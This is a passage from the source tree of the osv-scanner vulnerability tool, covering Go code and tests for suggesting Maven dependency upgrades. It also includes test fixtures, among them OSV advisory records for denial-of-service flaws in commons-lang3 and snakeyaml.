-1, IgnoreVulns: []string{"OSV-2"}, }, want: false, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() if got := tt.opt.MatchVuln(tt.vuln); got != tt.want { t.Errorf("MatchVuln() = %v, want %v", got, tt.want) } }) } } ================================================ FILE: internal/remediation/suggest/maven.go ================================================ package suggest import ( "context" "errors" "fmt" "slices" "strings" "deps.dev/util/resolve" "deps.dev/util/semver" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/utility/maven" ) type MavenSuggester struct{} // Suggest returns the ManifestPatch to update Maven dependencies to a newer // version based on the options. // ManifestPatch also includes the property patches to update. func (ms *MavenSuggester) Suggest(ctx context.Context, cl resolve.Client, mf manifest.Manifest, opts Options) (manifest.Patch, error) { specific, ok := mf.EcosystemSpecific.(manifest.MavenManifestSpecific) if !ok { return manifest.Patch{}, errors.New("invalid MavenManifestSpecific data") } var changedDeps []manifest.DependencyPatch for _, req := range append(mf.Requirements, specific.RequirementsForUpdates...) { if opts.UpgradeConfig.Get(req.Name) == upgrade.None { continue } if opts.IgnoreDev && slices.Contains(mf.Groups[manifest.MakeRequirementKey(req)], "test") { // Skip the update if the dependency is of development group // and updates on development dependencies are not desired continue } if strings.Contains(req.Name, "${") && strings.Contains(req.Version, "${") { // If there are unresolved properties, we should skip this version. continue } latest, err := suggestMavenVersion(ctx, cl, req, opts.UpgradeConfig.Get(req.Name)) if err != nil { return manifest.Patch{}, fmt.Errorf("suggesting latest version of %s: %w", req.Version, err) } if latest.Version == req.Version { // No need to update continue } changedDeps = append(changedDeps, manifest.DependencyPatch{ Pkg: req.PackageKey, Type: req.Type, OrigRequire: req.Version, NewRequire: latest.Version, }) } return manifest.Patch{ Deps: changedDeps, Manifest: &mf, }, nil } // suggestMavenVersion returns the latest version based on the given Maven requirement version. // If there is no newer version available, req will be returned. // For a version range requirement, // - the greatest version matching the constraint is assumed when deciding whether the // update is a major update or not. // - if the latest version does not satisfy the constraint, this version is returned; // otherwise, the original version range requirement is returned. func suggestMavenVersion(ctx context.Context, cl resolve.Client, req resolve.RequirementVersion, level upgrade.Level) (resolve.RequirementVersion, error) { versions, err := cl.Versions(ctx, req.PackageKey) if err != nil { return resolve.RequirementVersion{}, fmt.Errorf("requesting versions of Maven package %s: %w", req.Name, err) } semvers := make([]*semver.Version, 0, len(versions)) for _, ver := range versions { parsed, err := semver.Maven.Parse(ver.Version) if err != nil { cmdlogger.Warnf("parsing Maven version %s: %v", parsed, err) continue } semvers = append(semvers, parsed) } constraint, err := semver.Maven.ParseConstraint(req.Version) if err != nil { return resolve.RequirementVersion{}, fmt.Errorf("parsing Maven constraint %s: %w", req.Version, err) } var current *semver.Version if constraint.IsSimple() { // Constraint is a simple version string, so can be parsed to a single version. current, err = semver.Maven.Parse(req.Version) if err != nil { return resolve.RequirementVersion{}, fmt.Errorf("parsing Maven version %s: %w", req.Version, err) } } else { // Guess the latest version satisfying the constraint is being used for _, v := range semvers { if constraint.MatchVersion(v) && current.Compare(v) < 0 { current = v } } } var newReq *semver.Version for _, v := range semvers { if maven.CompareVersions(req.VersionKey, v, newReq) < 0 { // Skip versions smaller than the current requirement continue } if _, diff := v.Difference(current); !level.Allows(diff) { continue } newReq = v } if constraint.IsSimple() || !constraint.MatchVersion(newReq) { // For version range requirement, update the requirement if the // new requirement does not satisfy the constraint. req.Version = newReq.String() } return req, nil } ================================================ FILE: internal/remediation/suggest/maven_test.go ================================================ package suggest import ( "path/filepath" "reflect" "sort" "testing" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution/manifest" ) var ( depMgmt = depTypeWithOrigin("management") depParent = depTypeWithOrigin("parent") depPlugin = depTypeWithOrigin("plugin@org.plugin:plugin") depProfileOne = depTypeWithOrigin("profile@profile-one") depProfileTwoMgmt = depTypeWithOrigin("profile@profile-two@management") ) func depTypeWithOrigin(origin string) dep.Type { var result dep.Type result.AddAttr(dep.MavenDependencyOrigin, origin) return result } func mavenReqKey(t *testing.T, name, artifactType, classifier string) manifest.RequirementKey { t.Helper() var typ dep.Type if artifactType != "" { typ.AddAttr(dep.MavenArtifactType, artifactType) } if classifier != "" { typ.AddAttr(dep.MavenClassifier, classifier) } return manifest.MakeRequirementKey(resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ Name: name, System: resolve.Maven, }, }, Type: typ, }) } func TestMavenSuggester_Suggest(t *testing.T) { t.Parallel() ctx := t.Context() client := resolve.NewLocalClient() addVersions := func(sys resolve.System, name string, versions []string) { for _, version := range versions { client.AddVersion(resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: sys, Name: name, }, VersionType: resolve.Concrete, Version: version, }}, nil) } } addVersions(resolve.Maven, "com.mycompany.app:parent-pom", []string{"1.0.0"}) addVersions(resolve.Maven, "junit:junit", []string{"4.11", "4.12", "4.13", "4.13.2"}) addVersions(resolve.Maven, "org.example:abc", []string{"1.0.0", "1.0.1", "1.0.2"}) addVersions(resolve.Maven, "org.example:no-updates", []string{"9.9.9", "10.0.0"}) addVersions(resolve.Maven, "org.example:property", []string{"1.0.0", "1.0.1"}) addVersions(resolve.Maven, "org.example:same-property", []string{"1.0.0", "1.0.1"}) addVersions(resolve.Maven, "org.example:another-property", []string{"1.0.0", "1.1.0"}) addVersions(resolve.Maven, "org.example:property-no-update", []string{"1.9.0", "2.0.0"}) addVersions(resolve.Maven, "org.example:xyz", []string{"2.0.0", "2.0.1"}) addVersions(resolve.Maven, "org.profile:abc", []string{"1.2.3", "1.2.4"}) addVersions(resolve.Maven, "org.profile:def", []string{"2.3.4", "2.3.5"}) addVersions(resolve.Maven, "org.import:xyz", []string{"6.6.6", "6.7.0", "7.0.0"}) addVersions(resolve.Maven, "org.dep:plugin-dep", []string{"2.3.1", "2.3.2", "2.3.3", "2.3.4"}) suggester, err := GetSuggester(resolve.Maven) if err != nil { t.Fatalf("failed to get Maven suggester: %v", err) } depProfileTwoMgmt.AddAttr(dep.MavenArtifactType, "pom") depProfileTwoMgmt.AddAttr(dep.Scope, "import") mf := manifest.Manifest{ FilePath: filepath.Join("testdata", "pom.xml"), Root: resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "com.mycompany.app:my-app", }, VersionType: resolve.Concrete, Version: "1.0.0", }, }, Requirements: []resolve.RequirementVersion{ { // Test dependencies are not updated. VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "junit:junit", }, VersionType: resolve.Requirement, Version: "4.12", }, Type: dep.NewType(dep.Test), }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:abc", }, VersionType: resolve.Requirement, Version: "1.0.1", }, }, { // A package is specified to disallow updates. VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:no-updates", }, VersionType: resolve.Requirement, Version: "9.9.9", }, }, { // The universal property should be updated. VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:property", }, VersionType: resolve.Requirement, Version: "1.0.0", }, }, { // Property cannot be updated, so update the dependency directly. VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:property-no-update", }, VersionType: resolve.Requirement, Version: "1.9", }, }, { // The property is updated to the same value. VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:same-property", }, VersionType: resolve.Requirement, Version: "1.0.0", }, }, { // Property needs to be updated to a different value, // so update dependency directly. VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:another-property", }, VersionType: resolve.Requirement, Version: "1.0.0", }, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:xyz", }, VersionType: resolve.Requirement, Version: "2.0.0", }, Type: depMgmt, }, }, Groups: map[manifest.RequirementKey][]string{ mavenReqKey(t, "junit:junit", "", ""): {"test"}, mavenReqKey(t, "org.import:xyz", "", ""): {"import"}, }, EcosystemSpecific: manifest.MavenManifestSpecific{ RequirementsForUpdates: []resolve.RequirementVersion{ { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "com.mycompany.app:parent-pom", }, VersionType: resolve.Requirement, Version: "1.0.0", }, Type: depParent, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:abc", }, VersionType: resolve.Requirement, Version: "1.2.3", }, Type: depProfileOne, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:def", }, VersionType: resolve.Requirement, Version: "2.3.4", }, Type: depProfileOne, }, { // A package is specified to ignore major updates. VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.import:xyz", }, VersionType: resolve.Requirement, Version: "6.6.6", }, Type: depProfileTwoMgmt, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.dep:plugin-dep", }, VersionType: resolve.Requirement, Version: "2.3.3", }, Type: depPlugin, }, }, }, } got, err := suggester.Suggest(ctx, client, mf, Options{ IgnoreDev: true, // Do no update test dependencies. UpgradeConfig: upgrade.Config{ "org.example:no-updates": upgrade.None, "org.import:xyz": upgrade.Minor, }, }) if err != nil { t.Fatalf("failed to suggest ManifestPatch: %v", err) } want := manifest.Patch{ Deps: []manifest.DependencyPatch{ { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.dep:plugin-dep", }, Type: depPlugin, OrigRequire: "2.3.3", NewRequire: "2.3.4", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:abc", }, OrigRequire: "1.0.1", NewRequire: "1.0.2", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:another-property", }, OrigRequire: "1.0.0", NewRequire: "1.1.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:property", }, OrigRequire: "1.0.0", NewRequire: "1.0.1", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:property-no-update", }, OrigRequire: "1.9", NewRequire: "2.0.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:same-property", }, OrigRequire: "1.0.0", NewRequire: "1.0.1", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:xyz", }, Type: depMgmt, OrigRequire: "2.0.0", NewRequire: "2.0.1", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.import:xyz", }, Type: depProfileTwoMgmt, OrigRequire: "6.6.6", NewRequire: "6.7.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:abc", }, Type: depProfileOne, OrigRequire: "1.2.3", NewRequire: "1.2.4", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:def", }, Type: depProfileOne, OrigRequire: "2.3.4", NewRequire: "2.3.5", }, }, Manifest: &mf, } sort.Slice(got.Deps, func(i, j int) bool { return got.Deps[i].Pkg.Name < got.Deps[j].Pkg.Name }) if !reflect.DeepEqual(got, want) { t.Fatalf("ManifestPatch suggested does not match expected: got %v\n want %v", got, want) } } func Test_suggestMavenVersion(t *testing.T) { t.Parallel() ctx := t.Context() lc := resolve.NewLocalClient() pk := resolve.PackageKey{ System: resolve.Maven, Name: "abc:xyz", } for _, version := range []string{"1.0.0", "1.0.1", "1.1.0", "1.2.3", "2.0.0", "2.2.2", "2.3.4"} { lc.AddVersion(resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Concrete, Version: version, }}, nil) } tests := []struct { requirement string level upgrade.Level want string }{ {"1.0.0", upgrade.Major, "2.3.4"}, // No major updates allowed {"1.0.0", upgrade.Minor, "1.2.3"}, // Only allow patch updates {"1.0.0", upgrade.Patch, "1.0.1"}, // Version range requirement is not outdated {"[1.0.0,)", upgrade.Major, "[1.0.0,)"}, {"[2.0.0,2.3.4]", upgrade.Major, "[2.0.0,2.3.4]"}, // Version range requirement is outdated {"[2.0.0,2.3.4)", upgrade.Major, "2.3.4"}, {"[2.0.0,2.2.2]", upgrade.Major, "2.3.4"}, // Version range requirement is outdated but latest version is a major update {"[1.0.0,2.0.0)", upgrade.Major, "2.3.4"}, {"[1.0.0,2.0.0)", upgrade.Minor, "[1.0.0,2.0.0)"}, } for _, tt := range tests { vk := resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Requirement, Version: tt.requirement, } want := resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Requirement, Version: tt.want, }, } got, err := suggestMavenVersion(ctx, lc, resolve.RequirementVersion{VersionKey: vk}, tt.level) if err != nil { t.Fatalf("fail to suggest a new version for %v: %v", vk, err) } if !reflect.DeepEqual(got, want) { t.Errorf("suggestMavenVersion(%v, %v): got %s want %s", vk, tt.level, got, want) } } } func TestSuggestVersion_Guava(t *testing.T) { t.Parallel() ctx := t.Context() lc := resolve.NewLocalClient() pk := resolve.PackageKey{ System: resolve.Maven, Name: "com.google.guava:guava", } for _, version := range []string{"1.0.0", "1.0.1-android", "1.0.1-jre", "1.1.0-android", "1.1.0-jre", "2.0.0-android", "2.0.0-jre"} { lc.AddVersion(resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Concrete, Version: version, }}, nil) } tests := []struct { requirement string level upgrade.Level want string }{ {"1.0.0", upgrade.Major, "2.0.0-jre"}, // Update to the version with the same flavour {"1.0.1-jre", upgrade.Major, "2.0.0-jre"}, {"1.0.1-android", upgrade.Major, "2.0.0-android"}, {"1.0.1-jre", upgrade.Minor, "1.1.0-jre"}, {"1.0.1-android", upgrade.Minor, "1.1.0-android"}, // Version range requirement is not outdated {"[1.0.0,)", upgrade.Major, "[1.0.0,)"}, // Version range requirement is outdated and the latest version is a major update {"[1.0.0,2.0.0)", upgrade.Major, "2.0.0-jre"}, {"[1.0.0,2.0.0)", upgrade.Minor, "[1.0.0,2.0.0)"}, } for _, tt := range tests { vk := resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Requirement, Version: tt.requirement, } want := resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Requirement, Version: tt.want, }, } got, err := suggestMavenVersion(ctx, lc, resolve.RequirementVersion{VersionKey: vk}, tt.level) if err != nil { t.Fatalf("fail to suggest a new version for %v: %v", vk, err) } if !reflect.DeepEqual(got, want) { t.Errorf("suggestMavenVersion(%v, %v): got %s want %s", vk, tt.level, got, want) } } } func TestSuggestVersion_Commons(t *testing.T) { t.Parallel() ctx := t.Context() lc := resolve.NewLocalClient() pk := resolve.PackageKey{ System: resolve.Maven, Name: "commons-io:commons-io", } for _, version := range []string{"1.0.0", "1.0.1", "1.1.0", "2.0.0", "20010101.000000"} { lc.AddVersion(resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Concrete, Version: version, }}, nil) } tests := []struct { requirement string level upgrade.Level want string }{ {"1.0.0", upgrade.Major, "2.0.0"}, // No major updates allowed {"1.0.0", upgrade.Minor, "1.1.0"}, // Only allow patch updates {"1.0.0", upgrade.Patch, "1.0.1"}, // Version range requirement is not outdated {"[1.0.0,)", upgrade.Major, "[1.0.0,)"}, // Version range requirement is outdated and the latest version is a major update {"[1.0.0,2.0.0)", upgrade.Major, "2.0.0"}, {"[1.0.0,2.0.0)", upgrade.Minor, "[1.0.0,2.0.0)"}, } for _, tt := range tests { vk := resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Requirement, Version: tt.requirement, } want := resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Requirement, Version: tt.want, }, } got, err := suggestMavenVersion(ctx, lc, resolve.RequirementVersion{VersionKey: vk}, tt.level) if err != nil { t.Fatalf("fail to suggest a new version for %v: %v", vk, err) } if !reflect.DeepEqual(got, want) { t.Errorf("suggestMavenVersion(%v, %v): got %s want %s", vk, tt.level, got, want) } } } ================================================ FILE: internal/remediation/suggest/suggest.go ================================================ // Package suggest provides functionality for suggesting version updates. package suggest import ( "context" "errors" "fmt" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution/manifest" ) type Options struct { IgnoreDev bool // Whether we should ignore development dependencies for updates UpgradeConfig upgrade.Config // Allowed upgrade levels per package. } // A PatchSuggester provides an ecosystem-specific method for 'suggesting' // ManifestPatch for dependency updates. type PatchSuggester interface { // Suggest returns the ManifestPatch required to update the dependencies to // a newer version based on the given options. // ManifestPatch includes ecosystem-specific information. Suggest(ctx context.Context, client resolve.Client, mf manifest.Manifest, opts Options) (manifest.Patch, error) } func GetSuggester(system resolve.System) (PatchSuggester, error) { switch system { case resolve.Maven: return &MavenSuggester{}, nil case resolve.NPM: return nil, errors.New("npm not yet supported") case resolve.UnknownSystem: return nil, errors.New("unknown system") default: return nil, fmt.Errorf("unsupported ecosystem: %v", system) } } ================================================ FILE: internal/remediation/testdata/maven-classifier/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: internal/remediation/testdata/maven-classifier/pom.xml ================================================ 4.0.0 dev.osv maven-classifier 1 com.github.javafaker javafaker 1.0.2 ================================================ FILE: internal/remediation/testdata/maven-classifier/universe.yaml ================================================ # Automatically generated by generate_mock_resolution_universe on 06 Nov 25 09:05 AEDT. DO NOT EDIT. system: Maven schema: | com.github.javafaker:javafaker 1.0.2 org.apache.commons:commons-lang3@3.5 MavenClassifier android|org.yaml:snakeyaml@1.23 com.github.mifmif:generex@1.0.2 com.github.mifmif:generex 1.0.2 dk.brics.automaton:automaton@1.11-8 dk.brics.automaton:automaton 1.11-8 org.apache.commons:commons-lang3 3.5 3.18.0 org.apache.commons:commons-parent 41 85 org.apache:apache 18 35 org.junit:junit-bom 5.13.1 org.sonatype.oss:oss-parent 7 org.yaml:snakeyaml 1.23 ================================================ FILE: internal/remediation/testdata/maven-classifier/vulns.json ================================================ { "vulns": [ { "schema_version": "1.7.3", "id": "GHSA-j288-q9x7-2f5v", "published": "2025-07-11T15:31:37Z", "modified": "2025-11-05T20:34:04.566048Z", "aliases": [ "CVE-2025-48924" ], "related": [ "CGA-22cr-f3cr-c7cm", "CGA-29x5-f7v5-rrg6", "CGA-2fmr-p6rq-h6gj", "CGA-48h5-566h-rvpp", "CGA-4fcv-jq36-r7hx", "CGA-523g-m72h-8798", "CGA-6pxc-gq99-gpx4", "CGA-6v52-24xf-x875", "CGA-78fw-62xf-9rm8", "CGA-7r2r-4fw7-h3qv", "CGA-8c99-22mx-hg38", "CGA-8w2x-v747-c9c7", "CGA-8x43-fp55-w32w", "CGA-9j28-2jv5-qv67", "CGA-9rcm-4h29-rv8h", "CGA-ff3x-mc4g-82q2", "CGA-g3gg-7c6f-x6qx", "CGA-hj53-w7gr-6f9r", "CGA-j6cx-9v8j-x9cc", "CGA-j84p-prch-g8wm", "CGA-j8w2-rj92-x353", "CGA-j93m-mcxv-7hxr", "CGA-jvxv-2xch-6xjm", "CGA-m7pc-jwx3-vm7v", "CGA-mhg4-342v-w7xq", "CGA-mp4q-mrjj-8862", "CGA-p7fm-p736-2fmc", "CGA-p87f-qfxg-x45v", "CGA-pxx2-65vr-8cc4", "CGA-rc28-932p-89cv", "CGA-v52f-47gw-2xcm", "CGA-vxhq-8vpg-mr2p" ], "summary": "Apache Commons Lang is vulnerable to Uncontrolled Recursion when processing long inputs", "details": "Uncontrolled Recursion vulnerability in Apache Commons Lang.\n\nThis issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0.\n\nThe methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop.\n\nUsers are recommended to upgrade to version 3.18.0, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-lang3", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-lang3" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0" }, { "fixed": "3.18.0" } ] } ], "versions": [ "3.0", "3.0.1", "3.1", "3.10", "3.11", "3.12.0", "3.13.0", "3.14.0", "3.15.0", "3.16.0", "3.17.0", "3.2", "3.2.1", "3.3", "3.3.1", "3.3.2", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-j288-q9x7-2f5v/GHSA-j288-q9x7-2f5v.json" } }, { "package": { "name": "commons-lang:commons-lang", "ecosystem": "Maven", "purl": "pkg:maven/commons-lang/commons-lang" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0" }, { "last_affected": "2.6" } ] } ], "versions": [ "2.0", "2.1", "2.2", "2.3", "2.4", "2.5", "2.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-j288-q9x7-2f5v/GHSA-j288-q9x7-2f5v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48924" }, { "type": "WEB", "url": "https://github.com/apache/commons-lang/commit/b424803abdb2bec818e4fbcb251ce031c22aca53" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-lang" }, { "type": "WEB", "url": "https://lists.apache.org/thread/bgv0lpswokgol11tloxnjfzdl7yrc1g1" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00000.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00026.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00032.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00036.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/07/11/1" } ], "database_specific": { "cwe_ids": [ "CWE-674" ], "github_reviewed": true, "github_reviewed_at": "2025-07-12T00:48:03Z", "nvd_published_at": "2025-07-11T15:15:24Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3mc7-4q67-w48m", "published": "2022-08-31T00:00:24Z", "modified": "2024-03-15T19:20:56.900754Z", "aliases": [ "CVE-2022-25857" ], "related": [ "CGA-8mhp-9r8c-whw4", "CGA-v8c3-wc4q-hfmx", "CGA-w753-xwwq-8ch4" ], "summary": "Uncontrolled Resource Consumption in snakeyaml", "details": "The package org.yaml:snakeyaml from 0 and before 1.31 are vulnerable to Denial of Service (DoS) due missing to nested depth limitation for collections.", "affected": [ { "package": { "name": "org.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.31" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23", "1.24", "1.25", "1.26", "1.27", "1.28", "1.29", "1.30", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-3mc7-4q67-w48m/GHSA-3mc7-4q67-w48m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25857" }, { "type": "WEB", "url": "https://github.com/snakeyaml/snakeyaml/commit/fc300780da21f4bb92c148bc90257201220cf174" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/commits/fc300780da21f4bb92c148bc90257201220cf174" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/525" }, { "type": "PACKAGE", "url": "https://github.com/snakeyaml/snakeyaml" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240315-0010" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGYAML-2806360" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-776" ], "github_reviewed": true, "github_reviewed_at": "2022-09-09T17:53:43Z", "nvd_published_at": "2022-08-30T05:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-98wm-3w3q-mw94", "published": "2022-09-06T00:00:27Z", "modified": "2024-03-15T12:49:11.748743Z", "aliases": [ "CVE-2022-38751" ], "related": [ "CGA-765h-9f88-48rm", "CGA-hrp6-hg6x-533q", "CGA-vf63-mx7x-xrxr" ], "summary": "snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write", "details": "Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.", "affected": [ { "package": { "name": "org.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.31" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23", "1.24", "1.25", "1.26", "1.27", "1.28", "1.29", "1.30", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-98wm-3w3q-mw94/GHSA-98wm-3w3q-mw94.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38751" }, { "type": "PACKAGE", "url": "https://bitbucket.org/snakeyaml/snakeyaml" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/530/stackoverflow-oss-fuzz-47039" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/src/master/src/test/java/org/yaml/snakeyaml/issues/issue530/Fuzzy47039Test.java" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47039" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-28" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240315-0010" } ], "database_specific": { "cwe_ids": [ "CWE-121", "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-09-16T17:45:10Z", "nvd_published_at": "2022-09-05T10:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9w3m-gqgf-c4p9", "published": "2022-09-06T00:00:27Z", "modified": "2024-03-15T12:59:23.253312Z", "aliases": [ "CVE-2022-38752" ], "related": [ "CGA-7jxj-mv7q-86xp", "CGA-85g9-6hwh-32gx", "CGA-jqmf-qxq4-phw6", "CGA-ph82-mcm9-7236" ], "summary": "snakeYAML before 1.32 vulnerable to Denial of Service due to Out-of-bounds Write", "details": "Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack-overflow.", "affected": [ { "package": { "name": "org.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.32" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23", "1.24", "1.25", "1.26", "1.27", "1.28", "1.29", "1.30", "1.31", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-9w3m-gqgf-c4p9/GHSA-9w3m-gqgf-c4p9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38752" }, { "type": "PACKAGE", "url": "https://bitbucket.org/snakeyaml/snakeyaml" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/531/stackoverflow-oss-fuzz-47081" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47081" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-28" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240315-0009" } ], "database_specific": { "cwe_ids": [ "CWE-121", "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-09-13T21:29:45Z", "nvd_published_at": "2022-09-05T10:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, 